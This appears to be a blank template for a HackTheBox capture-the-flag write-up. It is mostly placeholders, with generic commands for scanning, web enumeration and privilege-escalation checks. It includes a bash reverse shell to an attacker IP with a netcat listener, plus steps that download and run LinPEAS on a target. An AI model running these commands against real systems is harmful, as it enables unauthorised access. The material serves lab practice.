Rootinator
← Back to Writeups
{{title}}
HackTheBox
Medium
Windows
January 23, 2026
Machine Information
| Property | Value |
|---|---|
| Name | |
| OS | Windows |
| Difficulty | Medium |
| IP | 10.10.11.x |
Summary
TL;DR
Brief one-paragraph summary of the box - what vulnerabilities were exploited and key techniques used.
Key Vulnerabilities:
- Vulnerability 1
- Vulnerability 2
- Vulnerability 3
Enumeration
Nmap Scan
Initial scan:
nmap -vv -T5 -p- *TARGET_IP*
nmap -vv -T5 -p*DISOVERED_PORTS* -sC -sV *TARGET_IP*
Results:
| Port | Service | TCP/UDP |
|---|---|---|
| 53 | DNS | TCP |
| 88 | Kerberos | TCP |
| 135 | RPC | TCP |
| 139 | Netbios | TCP |
| 389 | LDAP | TCP |
| 445 | SMB | TCP |
| 593 | HTTP RPC | TCP |
| 3268 | LDAP | TCP |
| 5985 | WinRM | TCP |
Key findings:
- Service 1: Description
- Service 2: Description
Web Enumeration
Directory brute-forcing:
gobuster dir -u http://10.10.11.x -w /usr/share/wordlists/dirb/common.txt
Discovered endpoints:
/admin- Admin panel/api- REST API/uploads- File upload directory
Technology stack:
- Framework:
- Language:
- Database:
Port XXX Enumeration
Initial Foothold
Vulnerability Discovery
Vulnerability: [Vulnerability Name]
Details
Explain the vulnerability - what it is, why it exists, how it works
Testing the vulnerability:
# Commands used to test/verify the vulnerability
Proof of Concept:
# Exploit code or script
import requests
url = "http://10.10.11.x/vulnerable-endpoint"
payload = {}
response = requests.post(url, data=payload)
print(response.text)
Exploitation
Step 1: [Action taken]
# Commands
Step 2: [Next action]
# Commands
Getting a shell:
# Reverse shell command
bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'
Listener:
nc -lvnp 4444
Shell
Successfully gained shell as [username]
User Flag
Stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
Enumerate the system:
whoami
id
uname -a
pwd
ls -la
User flag location:
cat /home/user/user.txt
flag{user_flag_here}
Privilege Escalation
Enumeration as [username]
Check sudo privileges:
sudo -l
Check for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Check for interesting files:
find / -name "*.conf" 2>/dev/null | grep -v "proc\|sys"
Running LinPEAS:
# On attacker machine
python3 -m http.server 8000
# On target
wget http://10.10.14.x:8000/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh
Lateral Movement (if applicable)
Discovery
Explanation of how to move laterally
Exploitation:
# Commands to switch users
Root Escalation
Vulnerability: [Escalation method]
Exploitation Path
Detailed explanation of the privilege escalation vulnerability
[!warning] Exploitation Path Detailed explanation of the privilege escalation vulnerability
Exploitation steps:
Step 1:
# Command
Step 2:
# Command
Step 3:
# Command
Root Access
Successfully escalated privileges to root
Root Flag
whoami
# root
cat /root/root.txt
flag{root_flag_here}
Post-Exploitation
Flags:
- User:
flag{user_flag_here} -
Root:
flag{root_flag_here}Tools Used
| Tool | Purpose | Command/Usage |
|---|---|---|
| nmap | Port scanning | nmap -sC -sV target |
| gobuster | Directory enumeration | gobuster dir -u URL -w wordlist |
| burpsuite | Web traffic analysis | Interactive |
| linpeas | Linux enumeration | ./linpeas.sh |
| custom exploit | Specific vulnerability | python3 exploit.py |
References
- Vulnerability Name - CVE-XXXX-XXXXX
- GTFOBins - Tool
- HackTricks - Technique
- OWASP - Vulnerability Type
Timeline
graph LR
A[Nmap Scan] --> B[Web Enum]
B --> C[Vuln Discovery]
C --> D[Initial Shell]
D --> E[User Flag]
E --> F[PrivEsc Enum]
F --> G[Root Shell]
G --> H[Root Flag]
Pwned on: [Date Here]
Difficulty Rating: ⭐⭐⭐⭐⭐ (Personal rating)
Fun Factor: ⭐⭐⭐⭐⭐ (How enjoyable was it?)